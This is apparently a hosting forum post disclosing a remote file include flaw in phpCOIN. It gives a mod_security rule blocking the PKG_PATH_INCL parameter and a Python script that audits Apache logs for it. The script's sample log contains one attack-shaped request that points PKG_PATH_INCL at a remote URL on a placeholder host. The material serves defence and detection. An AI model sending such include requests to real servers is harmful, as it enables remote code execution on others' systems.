The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.
Please see: http://downloads.securityfocus.com/vulnerabilities/exploits/phpCOIN1.2.3_fi_poc.txt
Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your mod_security configuration.
SecFilter "PKG_PATH_INCL"
That should take care of it until Fantastico/PHPCoin releases an update.
Chris Meisinger
WingSix Hosting
www.wingsix.com
edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.
Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now I'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
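Added example (not from the post above, not phpCOIN or mod_security code): once the SecFilter is in place it blocks new requests, but it does nothing for traffic that arrived before it was added. The script below audits an Apache combined-format access log for the same pattern the rule matches, i.e. any request carrying a PKG_PATH_INCL query parameter, and rates a hit higher when the value points at a remote URL (the remote file include case) or lands on a script under coin_includes (the broadened case from "Edit part 2"). The log lines and the coin_includes file names are constructed placeholders, not real traffic or real phpCOIN paths.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (Apache combined format); IPs are documentation ranges,
# and the coin_includes script names are placeholders, not real phpCOIN files.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2005:13:55:36 +0000] "GET /coin_includes/example_a.php?PKG_PATH_INCL=http://198.51.100.7/x.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.20 - - [10/Oct/2005:13:56:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2005:13:56:40 +0000] "GET /coin_includes/example_b.php?PKG_PATH_INCL=foo HTTP/1.0" 200 300 "-" "Mozilla/4.0"
192.0.2.9 - - [10/Oct/2005:13:57:12 +0000] "GET /coin_includes/example_c.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to recover client, timestamp, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Values starting with a URL scheme are the remote-include case.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

PARAM = "PKG_PATH_INCL"   # the variable the post's SecFilter line matches on


def parse_line(line):
    """Return the interesting fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_request(target):
    """Return a finding for a request target that carries PKG_PATH_INCL, else None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    values = params.get(PARAM)
    if values is None:
        return None
    remote = any(REMOTE_SCHEME_RE.match(v) for v in values)
    return {
        "path": parts.path,
        "values": values,
        # "Edit part 2": any script under coin_includes is reachable, not just one file.
        "coin_includes": "/coin_includes/" in parts.path,
        "remote_include": remote,
        # Remote value: the file-include case from the post. Anything else: still no
        # legitimate reason for the variable to appear in a URL, so worth a look.
        "severity": "high" if remote else "medium",
    }


def scan_log(text):
    """Scan log text line by line and return a list of findings in file order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        finding = inspect_request(rec["target"])
        if finding is not None:
            finding.update(ip=rec["ip"], ts=rec["ts"], status=rec["status"])
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} [{f['ts']}] {f['severity']:6} {f['path']} "
              f"{PARAM}={f['values']} status={f['status']}")
```

A 200 status on a flagged line is the one to chase, since it means the request reached PHP before the filter existed. The parameter name is matched exactly, as in the post's rule; the check only covers the query string, so a POST body would need the body itself logged or the mod_security POST scanning option enabled to be caught the same way.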